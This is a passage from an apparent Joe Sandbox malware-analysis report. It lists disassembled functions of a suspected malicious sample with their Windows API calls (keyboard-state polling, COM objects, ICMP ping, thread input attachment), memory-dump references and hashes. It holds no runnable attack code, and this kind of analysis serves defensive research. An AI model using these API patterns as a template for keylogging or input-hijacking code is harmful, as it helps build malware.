                            • GetKeyState.USER32(000000A1), ref: 000C365C
                            • GetAsyncKeyState.USER32(00000011), ref: 000C3674
                            • GetKeyState.USER32(00000011), ref: 000C3686
                            • GetAsyncKeyState.USER32(00000012), ref: 000C369E
                            • GetKeyState.USER32(00000012), ref: 000C36B0
                            • GetAsyncKeyState.USER32(0000005B), ref: 000C36C8
                            • GetKeyState.USER32(0000005B), ref: 000C36DA
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: State$Async$Keyboard
                            • String ID:
                            • API String ID: 541375521-0
                            • Opcode ID: 86444dab1c2488e2ed3dd4c7c5be88a70dab2674a6a54f666d586461cf1cd828
                            • Instruction ID: 0db61f9c4e63f8c8e9b69a75b5f47020d531df97e4524b0c7d3553c85c95acbd
                            • Opcode Fuzzy Hash: 86444dab1c2488e2ed3dd4c7c5be88a70dab2674a6a54f666d586461cf1cd828
                            • Instruction Fuzzy Hash: 9E41E570514BC97DFFB097A49814BADBEE06B11348F04C04DD9C2466C2EBE49BC8CBA2
                            Function 000BA28D Relevance: 16.6, APIs: 11, Instructions: 109memoryCOMMON
                            Download Yara Rule
                            APIs
                            • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,00000000,?), ref: 000BA2AA
                            • SafeArrayAllocData.OLEAUT32(?), ref: 000BA2F5
                            • VariantInit.OLEAUT32(?), ref: 000BA307
                            • SafeArrayAccessData.OLEAUT32(?,?), ref: 000BA327
                            • VariantCopy.OLEAUT32(?,?), ref: 000BA36A
                            • SafeArrayUnaccessData.OLEAUT32(?), ref: 000BA37E
                            • VariantClear.OLEAUT32(?), ref: 000BA393
                            • SafeArrayDestroyData.OLEAUT32(?), ref: 000BA3A0
                            • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 000BA3A9
                            • VariantClear.OLEAUT32(?), ref: 000BA3BB
                            • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 000BA3C6
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                            • String ID:
                            • API String ID: 2706829360-0
                            • Opcode ID: 141b8f1b07562a6b0e49478fb58b41403317a22522197e4a0c3b8f075e8d556e
                            • Instruction ID: 94b190dfc7264fbcd42aa81e27a04713de32feada7a5edaab5c6f2d574df9de9
                            • Opcode Fuzzy Hash: 141b8f1b07562a6b0e49478fb58b41403317a22522197e4a0c3b8f075e8d556e
                            • Instruction Fuzzy Hash: E9412C75A00219AFCB01EFE4D8889DEBFB9FF48714F108065F541E3661DB71AA85CBA1
                            Function 000DB250 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 197comCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 000884A6: __swprintf.LIBCMT ref: 000884E5
                              • Part of subcall function 000884A6: __itow.LIBCMT ref: 00088519
                            • CoInitialize.OLE32 ref: 000DB298
                            • CoUninitialize.OLE32 ref: 000DB2A3
                            • CoCreateInstance.OLE32(?,00000000,00000017,0010D8FC,?), ref: 000DB303
                            • IIDFromString.OLE32(?,?), ref: 000DB376
                            • VariantInit.OLEAUT32(?), ref: 000DB410
                            • VariantClear.OLEAUT32(?), ref: 000DB471
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
                            • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                            • API String ID: 834269672-1287834457
                            • Opcode ID: 9365126728acab5b704aadf05231f2a05ca4faf2a4ffe85f75ec2407a2bb7939
                            • Instruction ID: e79ed5b01a2974ed11849e4433df9abc5cd09d8c85bf710f4e82857c741b4d12
                            • Opcode Fuzzy Hash: 9365126728acab5b704aadf05231f2a05ca4faf2a4ffe85f75ec2407a2bb7939
                            • Instruction Fuzzy Hash: 8B618A31604711EFC720DF54C885BAEB7E8AF89714F05481EF9859B292CB70EE44CBA2
                            Function 000D8694 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 163networkfileCOMMON
                            Download Yara Rule
                            APIs
                            • WSAStartup.WSOCK32(00000101,?), ref: 000D86F5
                            • inet_addr.WSOCK32(?,?,?), ref: 000D873A
                            • gethostbyname.WSOCK32(?), ref: 000D8746
                            • IcmpCreateFile.IPHLPAPI ref: 000D8754
                            • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 000D87C4
                            • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 000D87DA
                            • IcmpCloseHandle.IPHLPAPI(00000000), ref: 000D884F
                            • WSACleanup.WSOCK32 ref: 000D8855
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                            • String ID: Ping
                            • API String ID: 1028309954-2246546115
                            • Opcode ID: 1d4df85ac41883eb13d4d731a3560097003cdde37a358fc6e469807f537f3c29
                            • Instruction ID: 08690973fb38c1c6b74ac8c8e34c34b61e6eb36aca57822bee80e38658affb6d
                            • Opcode Fuzzy Hash: 1d4df85ac41883eb13d4d731a3560097003cdde37a358fc6e469807f537f3c29
                            • Instruction Fuzzy Hash: B951A0316043019FD720EF64CC89B6ABBE4AF48720F14892AF595DB3A1DF70E841DB51
                            Function 000E9C50 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 105windowCOMMON
                            Download Yara Rule
                            APIs
                            • _memset.LIBCMT ref: 000E9C68
                            • CreateMenu.USER32 ref: 000E9C83
                            • SetMenu.USER32(?,00000000), ref: 000E9C92
                            • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 000E9D1F
                            • IsMenu.USER32(?), ref: 000E9D35
                            • CreatePopupMenu.USER32 ref: 000E9D3F
                            • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 000E9D70
                            • DrawMenuBar.USER32 ref: 000E9D7E
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: Menu$CreateItem$DrawInfoInsertPopup_memset
                            • String ID: 0
                            • API String ID: 176399719-4108050209
                            • Opcode ID: adbafe72451f35d0b888b7719bd710f2058a19654cc110b7a91aa631050bb7ef
                            • Instruction ID: 6e3bd0d7c03bd12dd99975314fdde12bff152921a4138f216fc633261c9797bb
                            • Opcode Fuzzy Hash: adbafe72451f35d0b888b7719bd710f2058a19654cc110b7a91aa631050bb7ef
                            • Instruction Fuzzy Hash: 0A413579A04249AFDB24EFA5EC84BDABBF9FF49314F140028E945A7361D770A950CF60
                            Function 000CEC11 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 97COMMON
                            Download Yara Rule
                            APIs
                            • SetErrorMode.KERNEL32(00000001), ref: 000CEC1E
                            • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 000CEC94
                            • GetLastError.KERNEL32 ref: 000CEC9E
                            • SetErrorMode.KERNEL32(00000000,READY), ref: 000CED0B
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: Error$Mode$DiskFreeLastSpace
                            • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                            • API String ID: 4194297153-14809454
                            • Opcode ID: d644274a6e9bfcac184a07fd17d9edfafb92298e6bef25a45f7e56d2013393d1
                            • Instruction ID: c297d7d442d17aaf9d3ce769864932298eb0ea46c096b40126ae714bd2d531c5
                            • Opcode Fuzzy Hash: d644274a6e9bfcac184a07fd17d9edfafb92298e6bef25a45f7e56d2013393d1
                            • Instruction Fuzzy Hash: E131A135A002499FDB10EFA4C989FEEB7B4FF44710F14802AF506E7292DB719A42CB91
                            Function 000BC6FD Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 81windowCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 0008CAEE: _memmove.LIBCMT ref: 0008CB2F
                            • SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 000BC782
                            • GetDlgCtrlID.USER32 ref: 000BC78D
                            • GetParent.USER32 ref: 000BC7A9
                            • SendMessageW.USER32(00000000,?,00000111,?), ref: 000BC7AC
                            • GetDlgCtrlID.USER32(?), ref: 000BC7B5
                            • GetParent.USER32(?), ref: 000BC7D1
                            • SendMessageW.USER32(00000000,?,?,00000111), ref: 000BC7D4
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: MessageSend$CtrlParent$_memmove
                            • String ID: ComboBox$ListBox
                            • API String ID: 313823418-1403004172
                            • Opcode ID: d049cf7cebc56516aa6eee3fbe73e34d1da5ccd6238dea8a820567cef8e00dc3
                            • Instruction ID: 60719e1838fa3ea76b96e5694705ed75d9785e7d7ea9877824bd19fd8a72532c
                            • Opcode Fuzzy Hash: d049cf7cebc56516aa6eee3fbe73e34d1da5ccd6238dea8a820567cef8e00dc3
                            • Instruction Fuzzy Hash: 6A21A174940208BFEB05EBA4CC85EFEB7B5EF49310F104115F5A2D32D2DBB55956AB20
                            Function 000BC7E6 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 80windowCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 0008CAEE: _memmove.LIBCMT ref: 0008CB2F
                            • SendMessageW.USER32(?,00000186,00000002,00000000), ref: 000BC869
                            • GetDlgCtrlID.USER32 ref: 000BC874
                            • GetParent.USER32 ref: 000BC890
                            • SendMessageW.USER32(00000000,?,00000111,?), ref: 000BC893
                            • GetDlgCtrlID.USER32(?), ref: 000BC89C
                            • GetParent.USER32(?), ref: 000BC8B8
                            • SendMessageW.USER32(00000000,?,?,00000111), ref: 000BC8BB
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: MessageSend$CtrlParent$_memmove
                            • String ID: ComboBox$ListBox
                            • API String ID: 313823418-1403004172
                            • Opcode ID: dfd27ee424e599c21c29f441638f68f63d9d8805d9cf33afad2d0e53ddd1fd5b
                            • Instruction ID: 31c1d65b779e41108f6ea9db99f1b8da98320089029fd989ba8b6ab9ef7a434e
                            • Opcode Fuzzy Hash: dfd27ee424e599c21c29f441638f68f63d9d8805d9cf33afad2d0e53ddd1fd5b
                            • Instruction Fuzzy Hash: 0C218375900208BFEF04ABA4DC85EFEB7B5EF49300F104115F591E7192DBB59955AB20
                            Function 000BC8CD Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 71windowCOMMON
                            Download Yara Rule
                            APIs
                            • GetParent.USER32 ref: 000BC8D9
                            • GetClassNameW.USER32(00000000,?,00000100), ref: 000BC8EE
                            • _wcscmp.LIBCMT ref: 000BC900
                            • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 000BC97B
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: ClassMessageNameParentSend_wcscmp
                            • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                            • API String ID: 1704125052-3381328864
                            • Opcode ID: 1ff81d402d511772c065219c77d431ab80f1b6aaab5fd919b3caf21c044ee2c8
                            • Instruction ID: a5fcfa62e9a242ec47a531c45f262b391561985912f4821ee51d25104c078b2d
                            • Opcode Fuzzy Hash: 1ff81d402d511772c065219c77d431ab80f1b6aaab5fd919b3caf21c044ee2c8
                            • Instruction Fuzzy Hash: 8A11E976658302B9FA543A70EC0ECEAB7ECDB0B760F200022F910A50D2FBA269414564
                            Function 000DB74B Relevance: 15.3, APIs: 10, Instructions: 324fileCOMMON
                            Download Yara Rule
                            APIs
                            • VariantInit.OLEAUT32(?), ref: 000DB777
                            • CoInitialize.OLE32(00000000), ref: 000DB7A4
                            • CoUninitialize.OLE32 ref: 000DB7AE
                            • GetRunningObjectTable.OLE32(00000000,?), ref: 000DB8AE
                            • SetErrorMode.KERNEL32(00000001,00000029), ref: 000DB9DB
                            • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002), ref: 000DBA0F
                            • CoGetObject.OLE32(?,00000000,0010D91C,?), ref: 000DBA32
                            • SetErrorMode.KERNEL32(00000000), ref: 000DBA45
                            • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 000DBAC5
                            • VariantClear.OLEAUT32(0010D91C), ref: 000DBAD5
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
                            • String ID:
                            • API String ID: 2395222682-0
                            • Opcode ID: a675a49350f41262096d7bf274192fd2c6410c464d4e39a9a1bf0e7637fefbcb
                            • Instruction ID: edf9050216226c4780615c4000ea209c7d4af36d07e9c2011b28f77b94166747
                            • Opcode Fuzzy Hash: a675a49350f41262096d7bf274192fd2c6410c464d4e39a9a1bf0e7637fefbcb
                            • Instruction Fuzzy Hash: 0EC11271608345EFC700DF68C884A6AB7E9BF89308F00491EF58A9B351DB71ED45CB62
                            Function 000CB05A Relevance: 15.3, APIs: 10, Instructions: 317COMMON
                            Download Yara Rule
                            APIs
                            • SafeArrayGetVartype.OLEAUT32(?,00000000), ref: 000CB137
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: ArraySafeVartype
                            • String ID:
                            • API String ID: 1725837607-0
                            • Opcode ID: 368ae6dc20bc7e33ff2992460ff73af219eeef1ff0aa7642783431410b7b2455
                            • Instruction ID: 6e7094463eb1a717f6b8a71d4ca51cbf4b0efe829888365f009dd69c10857a09
                            • Opcode Fuzzy Hash: 368ae6dc20bc7e33ff2992460ff73af219eeef1ff0aa7642783431410b7b2455
                            • Instruction Fuzzy Hash: 2EC16875A0021ADFDB50CF98D482BAEB7F4FF09315F24406EE646E7291C735AA81CB90
                            Function 000ABA66 Relevance: 15.2, APIs: 10, Instructions: 219COMMON
                            Download Yara Rule
                            APIs
                            • __lock.LIBCMT ref: 000ABA74
                              • Part of subcall function 000A8984: __mtinitlocknum.LIBCMT ref: 000A8996
                              • Part of subcall function 000A8984: EnterCriticalSection.KERNEL32(000A0127,?,000A876D,0000000D), ref: 000A89AF
                            • __calloc_crt.LIBCMT ref: 000ABA85
                              • Part of subcall function 000A7616: __calloc_impl.LIBCMT ref: 000A7625
                              • Part of subcall function 000A7616: Sleep.KERNEL32(00000000,?,000A0127,?,0008125D,00000058,?,?), ref: 000A763C
                            • @_EH4_CallFilterFunc@8.LIBCMT ref: 000ABAA0
                            • GetStartupInfoW.KERNEL32(?,00136990,00000064,000A6B14,001367D8,00000014), ref: 000ABAF9
                            • __calloc_crt.LIBCMT ref: 000ABB44
                            • GetFileType.KERNEL32(00000001), ref: 000ABB8B
                            • InitializeCriticalSectionAndSpinCount.KERNEL32(0000000D,00000FA0), ref: 000ABBC4
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: CriticalSection__calloc_crt$CallCountEnterFileFilterFunc@8InfoInitializeSleepSpinStartupType__calloc_impl__lock__mtinitlocknum
                            • String ID:
                            • API String ID: 1426640281-0
                            • Opcode ID: 871059f4000fe266dd2e012903d010c5ae30d94d1e143c03a20aa68ceac3b137
                            • Instruction ID: 5aad16628e51b22ef3b96bd70bae85623891dc6c623c9fd68daf2df69ce262d4
                            • Opcode Fuzzy Hash: 871059f4000fe266dd2e012903d010c5ae30d94d1e143c03a20aa68ceac3b137
                            • Instruction Fuzzy Hash: 7D81D7709047458FCB24CFA8C844AADBBF0BF4B334B24426DD4A6AB3E2D7749842CB54
                            Function 000C7212 Relevance: 15.1, APIs: 10, Instructions: 107windowCOMMON
                            Download Yara Rule
                            APIs
                            • __swprintf.LIBCMT ref: 000C7226
                            • __swprintf.LIBCMT ref: 000C7233
                              • Part of subcall function 000A234B: __woutput_l.LIBCMT ref: 000A23A4
                            • FindResourceW.KERNEL32(?,?,0000000E), ref: 000C725D
                            • LoadResource.KERNEL32(?,00000000), ref: 000C7269
                            • LockResource.KERNEL32(00000000), ref: 000C7276
                            • FindResourceW.KERNEL32(?,?,00000003), ref: 000C7296
                            • LoadResource.KERNEL32(?,00000000), ref: 000C72A8
                            • SizeofResource.KERNEL32(?,00000000), ref: 000C72B7
                            • LockResource.KERNEL32(?), ref: 000C72C3
                            • CreateIconFromResourceEx.USER32(?,?,00000001,00030000,00000000,00000000,00000000), ref: 000C7322
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: Resource$FindLoadLock__swprintf$CreateFromIconSizeof__woutput_l
                            • String ID:
                            • API String ID: 1433390588-0
                            • Opcode ID: ccb59cd1561901a5aa4f9de87eb332c55c118e11e6bf90e808bf9bea8ca5a7fc
                            • Instruction ID: 3c4c9d609de166b9e8dd619435da83e4ebccad065f2768aaefe5f885238b692b
                            • Opcode Fuzzy Hash: ccb59cd1561901a5aa4f9de87eb332c55c118e11e6bf90e808bf9bea8ca5a7fc
                            • Instruction Fuzzy Hash: 1F31BEB5A0425ABBCB119FA0EC89EBF7BA9FF09340F004429FD05D2151E774DA90DAA0
                            Function 000C4A5B Relevance: 15.1, APIs: 10, Instructions: 88threadCOMMON
                            Download Yara Rule
                            APIs
                            • GetCurrentThreadId.KERNEL32 ref: 000C4A7D
                            • GetForegroundWindow.USER32(00000000,?,?,?,?,?,000C3AD7,?,00000001), ref: 000C4A91
                            • GetWindowThreadProcessId.USER32(00000000), ref: 000C4A98
                            • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,000C3AD7,?,00000001), ref: 000C4AA7
                            • GetWindowThreadProcessId.USER32(?,00000000), ref: 000C4AB9
                            • AttachThreadInput.USER32(?,00000000,00000001,?,?,?,?,?,000C3AD7,?,00000001), ref: 000C4AD2
                            • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,000C3AD7,?,00000001), ref: 000C4AE4
                            • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,000C3AD7,?,00000001), ref: 000C4B29
                            • AttachThreadInput.USER32(?,?,00000000,?,?,?,?,?,000C3AD7,?,00000001), ref: 000C4B3E
                            • AttachThreadInput.USER32(00000000,?,00000000,?,?,?,?,?,000C3AD7,?,00000001), ref: 000C4B49
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                            • String ID:
                            • API String ID: 2156557900-0
                            • Opcode ID: 1c2031ba1d5fae0c40421e8b570c1fece41b147a95e86053733923438078ce99
                            • Instruction ID: b2f9dd39ac7a17820d6846978f009ea0a5e366f0f989a7a8ac968ec3d7288224
                            • Opcode Fuzzy Hash: 1c2031ba1d5fae0c40421e8b570c1fece41b147a95e86053733923438078ce99
                            • Instruction Fuzzy Hash: 4531CE79601201BFDB209B55EC98F6EB7BABB41311F104009F914E75A0DBF5EE808B60
                            Function 000FEC19 Relevance: 15.1, APIs: 10, Instructions: 59windowCOMMON
                            Download Yara Rule
                            APIs
                            • GetClientRect.USER32(?), ref: 000FEC32
                            • SendMessageW.USER32(?,00001328,00000000,?), ref: 000FEC49
                            • GetWindowDC.USER32(?), ref: 000FEC55
                            • GetPixel.GDI32(00000000,?,?), ref: 000FEC64
                            • ReleaseDC.USER32(?,00000000), ref: 000FEC76
                            • GetSysColor.USER32(00000005), ref: 000FEC94
                            Memory Dump Source
